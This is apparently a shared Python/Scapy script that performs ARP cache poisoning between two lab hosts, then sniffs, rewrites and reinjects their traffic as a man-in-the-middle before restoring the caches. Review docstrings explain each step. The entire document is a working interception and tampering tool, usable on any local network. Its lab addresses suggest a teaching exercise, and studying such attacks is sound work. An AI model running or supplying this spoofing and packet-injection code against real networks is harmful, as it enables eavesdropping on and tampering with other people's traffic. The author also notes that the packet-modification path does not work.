Created
March 9, 2022 23:10
ARP example
#!/usr/bin/env python3 | |
import concurrent.futures | |
import subprocess | |
from time import sleep | |
from scapy.all import * | |
# Lab addressing. Only IP_A and IP_B are read by the code visible here (in the
# __main__ block); MAC_A, MAC_B and MAC_M are not referenced in this listing.
# NOTE(review): MAC_M is presumably the machine running this script - confirm.
IP_A, MAC_A = "10.9.0.5", "02:42:0a:09:00:05"
IP_B, MAC_B = "10.9.0.6", "02:42:0a:09:00:06"
MAC_M = "02:42:0a:09:00:69"

# Shared stop flag: read by stop_now() and spoof(), set by arp_spoofing().
QUIT = False
def stop_now(packet):
    """Return the module-level QUIT flag.

    Passed to sniff() as stop_filter; the packet argument is ignored.
    """
    should_stop = QUIT
    return should_stop
def get_MAC(ipaddr, iface="eht0"):
    """Resolve ipaddr to a hardware address with an ARP who-has request.

    Returns the hwsrc field of the first reply, or None when nothing answered.
    ARP replies are unauthenticated, so the result is whatever the first
    responder claims.
    """
    # NOTE(review): the default "eht0" looks like a typo for "eth0"; the only
    # caller visible in this file passes the interface explicitly.
    answered, _unanswered = sr(
        ARP(op="who-has", pdst=ipaddr), iface=iface, retry=-5, verbose=0
    )
    if len(answered) == 0:
        return None
    # Each answered entry is a (sent, received) pair; index 1 is the reply.
    first_reply = answered[0][1]
    return first_reply.hwsrc
def spoof(target_ip, target_mac, host, count=0):
    """Send target_ip an ARP "is-at" reply for host, repeatedly, until QUIT is set.

    hwsrc is not given in the ARP() call, so the sender's own address is used
    and printed; the reply therefore binds `host` to the sender's MAC in the
    target's cache. A steady stream of unsolicited is-at replies that rebinds
    an IP to a different MAC is the pattern ARP monitoring and dynamic ARP
    inspection are designed to flag.
    """
    print("Starting the spoof...")
    # count is never modified in the loop, so the interval is fixed up front:
    # 1 second when count > 0, otherwise 2 seconds.
    pause = 1 if count > 0 else 2
    while not QUIT:
        reply = ARP(op="is-at", psrc=host, hwdst=target_mac, pdst=target_ip)
        sent = send(reply, verbose=False, return_packets=True)
        print("sent packet from hwsrc: {} {}".format(reply.hwsrc, repr(sent[0])))
        sleep(pause)
    print("Stopping spoof - {}".format(QUIT))
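def restore(target_ip, target_mac, host, host_mac, count=5, only_target=False):
    """Send correct ARP "is-at" replies so the poisoned caches are repaired.

    Each round tells the target the real MAC of host and, unless only_target
    is set, tells host the real MAC of the target. Rounds are one second
    apart and `count` rounds are sent.

    The original used `continue` when only_target was set, which skipped both
    the sleep and the decrement, so the loop never ended and sent replies
    without any delay. The second reply is now simply skipped, and a
    non-positive count sends nothing instead of looping forever.
    """
    print("Restoring the poisoned caches...")
    while count > 0:
        # Correct binding for the target's cache: host is at host_mac.
        fix_target = ARP(op="is-at", hwsrc=host_mac, psrc=host,
                         hwdst=target_mac, pdst=target_ip)
        sent = send(fix_target, verbose=False, return_packets=True)
        print("sent packet from hwsrc: {} {}".format(fix_target.hwsrc, repr(sent[0])))

        if not only_target:
            # Correct binding for the host's cache: target_ip is at target_mac.
            fix_host = ARP(op="is-at", hwsrc=target_mac, psrc=target_ip,
                           hwdst=host_mac, pdst=host)
            sent = send(fix_host, verbose=False, return_packets=True)
            print("sent packet from hwsrc: {} {}".format(fix_host.hwsrc, repr(sent[0])))

        sleep(1)
        count -= 1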
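def arp_spoofing(target, host, interface="eth0", only_target=False):
    """Run the lab ARP cache poisoning exercise between target and host.

    Resolves both MAC addresses with get_MAC(), starts spoof() in background
    threads (one towards target, and one towards host unless only_target is
    set), then sniffs frames sent by either MAC on `interface` and hands each
    one to sniff_modify(). When sniffing ends, the spoof threads are stopped
    and restore() is called for both sides.

    Two robustness changes over the original:
    - if either MAC cannot be resolved, nothing is started (the original went
      on to build packets and a capture filter from None);
    - cleanup runs in a finally block, so an exception raised while sniffing
      no longer leaves the spoof threads running and the caches poisoned.
    """
    global QUIT

    # Send ARP requests and take the MAC addresses from the responses.
    target_MAC = get_MAC(target, interface)
    host_MAC = get_MAC(host, interface)
    print("Target's MAC: {}, Host's MAC: {}".format(target_MAC, host_MAC))
    if target_MAC is None or host_MAC is None:
        print("Could not resolve both MAC addresses; not starting.")
        return

    # Start the threads that keep spoofing in a while loop:
    # the target always, the host only when requested.
    executor = concurrent.futures.ThreadPoolExecutor(max_workers=5)
    executor.submit(spoof, target, target_MAC, host)
    if not only_target:
        executor.submit(spoof, host, host_MAC, target)

    def sniff_modify(packet):
        """Print a sniffed frame, rewrite it and send it on.

        Frames from target_MAC: the Ethernet addresses are rewritten, the TCP
        ports are set to 8000/56999, the SAckOK option is dropped, and the
        IP/TCP part is sent at layer 3. Frames from host_MAC: the Ethernet
        addresses are rewritten and the frame is sent at layer 2.
        """
        #ls(packet)
        print(repr(packet))
        sleep(1)
        #modification and injecting the packet without ip_forwarding doesn't work
        #TODO: needs to figure out why
        if packet[Ether].src == target_MAC:
            packet[Ether].src = packet[Ether].dst
            packet[Ether].dst = host_MAC
            # NOTE(review): assumes the frame carries IP and TCP layers - confirm.
            ip = packet[IP]
            tcp = packet[TCP]
            tcp.dport = 8000
            tcp.sport = 56999
            print(tcp.options)
            new_opt = []
            for opt in tcp.options:
                if opt[0] == 'SAckOK':
                    continue
                new_opt.append(opt)
            tcp.options = new_opt
            pkt = ip/tcp
            print("packet modified")
            print(repr(packet))
            send(pkt, iface="eth0", )
            print("sent....")
        elif packet[Ether].src == host_MAC:
            packet[Ether].src = packet[Ether].dst
            packet[Ether].dst = target_MAC
            print("packet modified")
            print(repr(packet))
            sendp(packet)
            print("sent....")

    #keep reading data asynchronously and transferring data
    #f = 'ip and ((src {} and dst {}) or (src {} and dst {}))'.format(
    #    target, host, host, target)
    f = 'ether src {} or ether src {}'.format(target_MAC, host_MAC)
    try:
        sniff(iface=interface, filter=f, prn=sniff_modify, stop_filter=stop_now)
    finally:
        # Stop the spoof threads first so that none of them sends another
        # reply after the correct bindings have been restored.
        QUIT = True
        executor.shutdown(wait=True)
        restore(target, target_MAC, host, host_MAC)
    print("Done!")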
if __name__ == "__main__":
    # The author left the kernel IP-forwarding step commented out:
    # cmd = "sysctl net.ipv4.ip_forward=1"
    # subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,shell=True)
    arp_spoofing(host=IP_B, target=IP_A)